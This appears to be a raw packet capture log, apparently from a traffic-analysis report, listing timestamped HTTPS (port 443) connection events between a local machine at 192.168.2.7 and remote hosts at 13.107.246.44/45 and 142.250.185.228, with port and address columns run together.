                                                                                                                                                                                                Nov 20, 2024 10:54:48.178541899 CET4434991013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.179275036 CET49912443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.179425001 CET49909443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.182043076 CET49910443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.182060003 CET4434991013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.182838917 CET49911443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.182845116 CET4434991113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.183068037 CET49912443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.183073997 CET4434991213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.183613062 CET49911443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.183617115 CET4434991113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.183816910 CET49912443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.183821917 CET4434991213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.184601068 CET49909443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.184613943 CET4434990913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.186022997 CET49909443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.186029911 CET4434990913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.279479980 CET4434991013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.279506922 CET4434991013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.279556036 CET49910443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.279577017 CET4434991013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.279891968 CET4434991013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.279937029 CET49910443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.281606913 CET4434991213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.281795025 CET4434990813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.281902075 CET4434991213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.282227993 CET49912443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.282361031 CET4434990813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.282422066 CET49908443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.282567024 CET4434991113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.282602072 CET4434991113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.282639980 CET4434991113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.282684088 CET49911443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.282684088 CET49911443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.284235001 CET4434990913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.284262896 CET4434990913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.284342051 CET4434990913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.284392118 CET49909443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.289505005 CET49910443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.289524078 CET4434991013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.289537907 CET49910443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.289542913 CET4434991013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.290399075 CET49909443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.290416002 CET4434990913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.290446997 CET49909443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.290453911 CET4434990913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.291938066 CET49912443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.291943073 CET4434991213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.293406010 CET49908443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.293412924 CET4434990813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.293425083 CET49908443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.293428898 CET4434990813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.294037104 CET49911443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.294037104 CET49911443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.294045925 CET4434991113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.294054031 CET4434991113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.343830109 CET49919443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.343869925 CET4434991913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.343943119 CET49919443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.347949028 CET49919443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.347964048 CET4434991913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.349106073 CET49920443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.349143028 CET4434992013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.349204063 CET49920443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.349344015 CET49921443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.349374056 CET4434992113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.349376917 CET49920443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.349390030 CET4434992013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.349481106 CET49921443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.349575996 CET49921443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.349586964 CET4434992113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.349755049 CET49922443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.349767923 CET4434992213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.349873066 CET49922443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.350915909 CET49922443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.350929022 CET4434992213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.351151943 CET49923443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.351169109 CET4434992313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.351731062 CET49923443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.351752043 CET49923443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.351756096 CET4434992313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.524246931 CET44349913142.250.185.228192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.527071953 CET49913443192.168.2.7142.250.185.228
                                                                                                                                                                                                Nov 20, 2024 10:54:48.527098894 CET44349913142.250.185.228192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.528043032 CET44349913142.250.185.228192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.528121948 CET49913443192.168.2.7142.250.185.228
                                                                                                                                                                                                Nov 20, 2024 10:54:48.557533026 CET49913443192.168.2.7142.250.185.228
                                                                                                                                                                                                Nov 20, 2024 10:54:48.558034897 CET44349913142.250.185.228192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.609361887 CET49913443192.168.2.7142.250.185.228
                                                                                                                                                                                                Nov 20, 2024 10:54:48.609391928 CET44349913142.250.185.228192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.651738882 CET49913443192.168.2.7142.250.185.228
                                                                                                                                                                                                Nov 20, 2024 10:54:48.744498014 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.760941982 CET4434991713.107.246.44192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.766379118 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.766397953 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.768059969 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.768146992 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.771857977 CET49917443192.168.2.713.107.246.44
                                                                                                                                                                                                Nov 20, 2024 10:54:48.771877050 CET4434991713.107.246.44192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.772831917 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.772933960 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.773041964 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.773047924 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.773499012 CET4434991713.107.246.44192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.773575068 CET49917443192.168.2.713.107.246.44
                                                                                                                                                                                                Nov 20, 2024 10:54:48.774498940 CET49917443192.168.2.713.107.246.44
                                                                                                                                                                                                Nov 20, 2024 10:54:48.774591923 CET4434991713.107.246.44192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.774688959 CET49917443192.168.2.713.107.246.44
                                                                                                                                                                                                Nov 20, 2024 10:54:48.814574957 CET49917443192.168.2.713.107.246.44
                                                                                                                                                                                                Nov 20, 2024 10:54:48.814591885 CET4434991713.107.246.44192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.814640999 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.860934973 CET49917443192.168.2.713.107.246.44
                                                                                                                                                                                                Nov 20, 2024 10:54:48.880428076 CET4434991713.107.246.44192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.880445004 CET4434991713.107.246.44192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.880454063 CET4434991713.107.246.44192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.880482912 CET4434991713.107.246.44192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.880491018 CET4434991713.107.246.44192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.880501986 CET4434991713.107.246.44192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.880553961 CET49917443192.168.2.713.107.246.44
                                                                                                                                                                                                Nov 20, 2024 10:54:48.880553961 CET49917443192.168.2.713.107.246.44
                                                                                                                                                                                                Nov 20, 2024 10:54:48.880578995 CET4434991713.107.246.44192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.880620956 CET49917443192.168.2.713.107.246.44
                                                                                                                                                                                                Nov 20, 2024 10:54:48.887196064 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.887209892 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.887219906 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.887238979 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.887248993 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.887265921 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.887309074 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.887329102 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.887346029 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.887365103 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.969954014 CET4434991713.107.246.44192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.969970942 CET4434991713.107.246.44192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.969989061 CET4434991713.107.246.44192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.970057964 CET49917443192.168.2.713.107.246.44
                                                                                                                                                                                                Nov 20, 2024 10:54:48.970057964 CET49917443192.168.2.713.107.246.44
                                                                                                                                                                                                Nov 20, 2024 10:54:48.970077038 CET4434991713.107.246.44192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.970119953 CET49917443192.168.2.713.107.246.44
                                                                                                                                                                                                Nov 20, 2024 10:54:48.972754955 CET4434991713.107.246.44192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.972775936 CET4434991713.107.246.44192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.972816944 CET49917443192.168.2.713.107.246.44
                                                                                                                                                                                                Nov 20, 2024 10:54:48.972825050 CET4434991713.107.246.44192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.972839117 CET4434991713.107.246.44192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.972852945 CET49917443192.168.2.713.107.246.44
                                                                                                                                                                                                Nov 20, 2024 10:54:48.972867012 CET49917443192.168.2.713.107.246.44
                                                                                                                                                                                                Nov 20, 2024 10:54:48.972904921 CET4434991713.107.246.44192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.972915888 CET49917443192.168.2.713.107.246.44
                                                                                                                                                                                                Nov 20, 2024 10:54:48.973233938 CET49917443192.168.2.713.107.246.44
                                                                                                                                                                                                Nov 20, 2024 10:54:48.974984884 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.975004911 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.975047112 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.975055933 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.975095034 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.975123882 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.975455999 CET49917443192.168.2.713.107.246.44
                                                                                                                                                                                                Nov 20, 2024 10:54:48.975472927 CET4434991713.107.246.44192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.977822065 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.977838039 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.977916002 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:48.977921009 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.978018999 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.000642061 CET4434992313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.002073050 CET4434992113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.019512892 CET4434992213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.020947933 CET4434991913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.021478891 CET4434992013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.041575909 CET49923443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.056452036 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.056473017 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.056539059 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.056550026 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.056622982 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.057316065 CET49921443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.058842897 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.058861971 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.058943987 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.058948994 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.059039116 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.066232920 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.066241026 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.066315889 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.066319942 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.066359043 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.066608906 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.066621065 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.066659927 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.066663027 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.066696882 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.066715002 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.069941044 CET49920443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.069941044 CET49922443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.069945097 CET49919443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.142741919 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.142769098 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.142880917 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.142890930 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.143065929 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.143810987 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.143829107 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.143866062 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.143871069 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.143893003 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.144141912 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.144818068 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.144835949 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.144870996 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.144875050 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.144896984 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.145739079 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.145761013 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.145791054 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.145796061 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.145808935 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.145836115 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.146727085 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.146744013 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.146779060 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.146783113 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.146800041 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.147628069 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.147677898 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.147682905 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.147725105 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.147731066 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.147888899 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.218369961 CET49920443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.218374968 CET4434992013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.223845959 CET49920443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.223850012 CET4434992013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.225281954 CET49923443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.225306034 CET4434992313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.226190090 CET49923443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.226206064 CET4434992313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.227147102 CET49921443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.227160931 CET4434992113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.228118896 CET49921443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.228141069 CET4434992113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.228390932 CET49922443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.228398085 CET4434992213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.228751898 CET49922443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.228755951 CET4434992213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.229252100 CET49919443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.229265928 CET4434991913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.229726076 CET49919443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.229732037 CET4434991913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.272366047 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.283720016 CET49918443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.283732891 CET4434991813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.324799061 CET4434992313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.324862957 CET4434992313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.324918032 CET4434992313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.324918032 CET49923443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.324985027 CET49923443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.326334953 CET4434992013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.326536894 CET49923443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.326564074 CET4434992013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.326570988 CET49923443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.326571941 CET4434992313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.326577902 CET4434992313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.326612949 CET49920443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.327109098 CET4434992113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.327197075 CET4434992113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.327212095 CET49920443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.327218056 CET4434992013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.327225924 CET49920443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.327229977 CET4434992013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.327235937 CET49921443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.327249050 CET4434992113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.327263117 CET4434992113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.327342033 CET49921443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.329641104 CET4434992213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.329704046 CET49921443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.329705954 CET4434992213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.329725981 CET4434992113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.329766035 CET49922443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.329766989 CET49921443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.329772949 CET4434992113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.330903053 CET4434991913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.331576109 CET4434991913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.331615925 CET49919443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.331624985 CET4434991913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.331672907 CET49919443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.331986904 CET49922443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.331994057 CET4434992213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.331999063 CET49922443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.332001925 CET4434992213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.332963943 CET49919443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:49.332973003 CET4434991913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:49.332989931 CET49919443192.168.2.713.107.246.45
